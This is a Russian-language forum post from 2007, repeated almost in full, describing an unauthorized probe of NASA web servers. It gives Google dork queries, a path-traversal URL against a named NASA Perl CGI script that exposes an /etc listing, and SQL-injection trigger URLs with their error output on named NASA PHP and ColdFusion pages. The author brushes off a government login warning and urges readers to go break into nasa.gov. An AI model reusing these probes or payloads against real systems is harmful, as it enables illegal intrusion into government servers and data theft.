m0liver
07.05.2007, 21:21
И так друг мой хочу представить тебе придставить не глубокий анализ серверов NASA.
Головной целю не было зламать основной сервер nasa ето глупо и на 99% не реально
я хотел показать что сервера NASA очень уязвимы для хакерских атак.Ну что начнём
иследования..... Хочу сразу сказать что без моего любимого google ничего бы не было
так что спасибо за то что ты есть! Первый запрос который я ввёл был site:nasa.gov
гугл сразу ответил что нашол около 6 610 000 ухты ну что будет над чем посидет ;)
Ну что поехали дальше меня интересовало есть ли на сервере cgi скрипты соотвецтвено
site:nasa.gov filetype:cgi так их тоже многа что говорит о возможности проверки на дыры.
site:nasa.gov filetype:cgi .txt .exe .pdf ну и тут меня ожидал облом:(
Ничего интересного небыло.Ну нечего идём дальше так дальше мне
пришло в голову проверить Perl скрипти на уязвимости в инклудинге меня сразу превлекла
ссылка:
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8+Year=1998+Month=August+Day=236
несколько експерементов над скриптом я обнаружыл
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8
скрипт выдал ошыбку:
Failed opendir /server/ftp/pub/browse/camex3/lase: No such file or directory
значит скрипт читает директории... Я попробывал вот так:
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?../../../../../../../../../../../../etc
но на минуту меня ожыдало розчерования:(
Вместо листинга файлов etc мне выдало страничку без картинок:( Но открывши сорцы
документа я увидел нечто такого:
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.gfslock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.initpipe
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.ioperms.lck
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.java
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.pwd.lock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.xlv_labd_fifo
......
Да мне показало страницу з etc файлами. Для проверки я вошол на фтп но сразу меня стретило привецтвия:
220-
************************************************** *****************************
WARNING! This is a U.S. Government computer.
This system is for the use of authorized users only. By
accessing and using the computer system you are consenting
to system monitoring, including the monitoring of keystrokes.
Unauthorized use of, or access to, this computer system may
subject you to disciplinary action and criminal prosecution.
************************************************** *****************************
220 GHRC: Public FTP Server ready...
Пользователь (microwave.nsstc.nasa.gov:(none)):
Переводить нету смысла брутить не стал пошол искать дальше что то интересное....
SQL Inj come back....
Ну чё з cgi & perl закончили идём смотреть php скрипты. И так запросим гугла вот так:
site:nasa.gov filetype:php mysql error и что мы видим сразу первая страница и SQL ошыбка
http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=455/
MYSQL query failed: SELECT * FROM publications WHERE id=455/. MYSQL Error 1064: You
have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1
Я не буду показывать как делать SQL inj ето глупо документаций по даной теме море!
Напомню я лиш хочу показать уязвимые места сервера а не взламовать его!
Дале проверел в ColdFusion скрипте была SQL из красивой одклаткой ощибки:
http://www-robotics.jpl.nasa.gov/projects/projectImage.cfm?Project=1&Image=1'
Дале я остановился и пошол спат:)
The End
Ну вот и всё наверно хотя даная проверка длилась не больше полтора часа и думаю багов
ищё мгого и много так что дерзай и иди ламай nasa.gov и не забудь написать письмо з
амерекоской тюряги:) Всё удачи.
Головной целю не было зламать основной сервер nasa ето глупо и на 99% не реально
я хотел показать что сервера NASA очень уязвимы для хакерских атак.Ну что начнём
иследования..... Хочу сразу сказать что без моего любимого google ничего бы не было
так что спасибо за то что ты есть! Первый запрос который я ввёл был site:nasa.gov
гугл сразу ответил что нашол около 6 610 000 ухты ну что будет над чем посидет ;)
Ну что поехали дальше меня интересовало есть ли на сервере cgi скрипты соотвецтвено
site:nasa.gov filetype:cgi так их тоже многа что говорит о возможности проверки на дыры.
site:nasa.gov filetype:cgi .txt .exe .pdf ну и тут меня ожидал облом:(
Ничего интересного небыло.Ну нечего идём дальше так дальше мне
пришло в голову проверить Perl скрипти на уязвимости в инклудинге меня сразу превлекла
ссылка:
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8+Year=1998+Month=August+Day=236
несколько експерементов над скриптом я обнаружыл
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8
скрипт выдал ошыбку:
Failed opendir /server/ftp/pub/browse/camex3/lase: No such file or directory
значит скрипт читает директории... Я попробывал вот так:
http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?../../../../../../../../../../../../etc
но на минуту меня ожыдало розчерования:(
Вместо листинга файлов etc мне выдало страничку без картинок:( Но открывши сорцы
документа я увидел нечто такого:
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.gfslock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.initpipe
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.ioperms.lck
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.java
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.pwd.lock
<a href="/camex3/camex_link/../../../../../../../../../../../../etc/.xlv_labd_fifo
......
Да мне показало страницу з etc файлами. Для проверки я вошол на фтп но сразу меня стретило привецтвия:
220-
************************************************** *****************************
WARNING! This is a U.S. Government computer.
This system is for the use of authorized users only. By
accessing and using the computer system you are consenting
to system monitoring, including the monitoring of keystrokes.
Unauthorized use of, or access to, this computer system may
subject you to disciplinary action and criminal prosecution.
************************************************** *****************************
220 GHRC: Public FTP Server ready...
Пользователь (microwave.nsstc.nasa.gov:(none)):
Переводить нету смысла брутить не стал пошол искать дальше что то интересное....
SQL Inj come back....
Ну чё з cgi & perl закончили идём смотреть php скрипты. И так запросим гугла вот так:
site:nasa.gov filetype:php mysql error и что мы видим сразу первая страница и SQL ошыбка
http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=455/
MYSQL query failed: SELECT * FROM publications WHERE id=455/. MYSQL Error 1064: You
have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '' at line 1
Я не буду показывать как делать SQL inj ето глупо документаций по даной теме море!
Напомню я лиш хочу показать уязвимые места сервера а не взламовать его!
Дале проверел в ColdFusion скрипте была SQL из красивой одклаткой ощибки:
http://www-robotics.jpl.nasa.gov/projects/projectImage.cfm?Project=1&Image=1'
Дале я остановился и пошол спат:)
The End
Ну вот и всё наверно хотя даная проверка длилась не больше полтора часа и думаю багов
ищё мгого и много так что дерзай и иди ламай nasa.gov и не забудь написать письмо з
амерекоской тюряги:) Всё удачи.